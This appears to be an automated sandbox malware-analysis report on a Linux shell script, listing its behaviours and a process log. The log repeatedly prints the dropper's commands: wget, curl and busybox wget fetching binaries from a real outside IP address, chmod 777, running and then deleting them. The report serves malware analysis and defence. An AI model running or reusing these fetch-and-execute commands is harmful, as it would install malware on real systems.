Analysis Overview
SHA256
91a1cdf18ca033207485813299cb0053f10c91d27700516e02d39d28ff0a47de
Threat Level: Shows suspicious behavior
The file 28da49fd9438da5ee3fa13fc53b5bd0c.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-10 01:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-10 01:07
Reported
2024-11-10 01:09
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
41s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | N/A |
| N/A | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | N/A |
| N/A | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | N/A |
| N/A | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | N/A |
| N/A | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | N/A |
| N/A | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | N/A |
| N/A | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | N/A |
| N/A | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | N/A |
| N/A | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | N/A |
| N/A | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | N/A |
| N/A | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | N/A |
| N/A | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | N/A |
| N/A | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | N/A |
| N/A | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | N/A |
| N/A | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | N/A |
| N/A | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | N/A |
| N/A | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | N/A |
| N/A | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | N/A |
| N/A | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | N/A |
| N/A | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | N/A |
| N/A | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | N/A |
| N/A | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | N/A |
| N/A | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | N/A |
| N/A | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | N/A |
| N/A | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | N/A |
| N/A | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | N/A |
| N/A | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | N/A |
| N/A | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /usr/bin/curl | N/A |
| File opened for modification | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /usr/bin/curl | N/A |
Processes
/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
[/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/chmod
[chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR
[./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/rm
[rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/usr/bin/wget
[wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/chmod
[chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b
[./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/rm
[rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/usr/bin/wget
[wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/chmod
[chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy
[./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/rm
[rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/usr/bin/wget
[wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/chmod
[chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X
[./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/rm
[rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/usr/bin/wget
[wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/chmod
[chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w
[./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/rm
[rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/usr/bin/wget
[wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/chmod
[chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda
[./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/rm
[rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/usr/bin/wget
[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/chmod
[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs
[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/rm
[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/usr/bin/wget
[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/chmod
[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM
[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/rm
[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/usr/bin/wget
[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/chmod
[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C
[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/rm
[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/usr/bin/wget
[wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/chmod
[chmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp
[./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/rm
[rm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/usr/bin/wget
[wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/chmod
[chmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK
[./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/rm
[rm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/usr/bin/wget
[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/chmod
[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE
[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/rm
[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/usr/bin/wget
[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/chmod
[chmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe
[./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/rm
[rm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/usr/bin/wget
[wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/chmod
[chmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw
[./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/rm
[rm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/chmod
[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM
[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/bin/rm
[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]
/usr/bin/wget
[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/chmod
[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C
[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/bin/rm
[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]
/usr/bin/wget
[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/chmod
[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs
[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/rm
[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/usr/bin/wget
[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/chmod
[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE
[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/bin/rm
[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]
/usr/bin/wget
[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/chmod
[chmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe
[./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/rm
[rm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/usr/bin/wget
[wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/chmod
[chmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw
[./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/rm
[rm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/usr/bin/wget
[wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/chmod
[chmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp
[./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/rm
[rm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/usr/bin/wget
[wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/chmod
[chmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK
[./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/rm
[rm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/usr/bin/wget
[wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/chmod
[chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy
[./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/rm
[rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/usr/bin/wget
[wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/chmod
[chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X
[./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/rm
[rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/usr/bin/wget
[wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/chmod
[chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR
[./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/rm
[rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/usr/bin/wget
[wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/chmod
[chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b
[./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/rm
[rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/usr/bin/wget
[wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/chmod
[chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w
[./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/rm
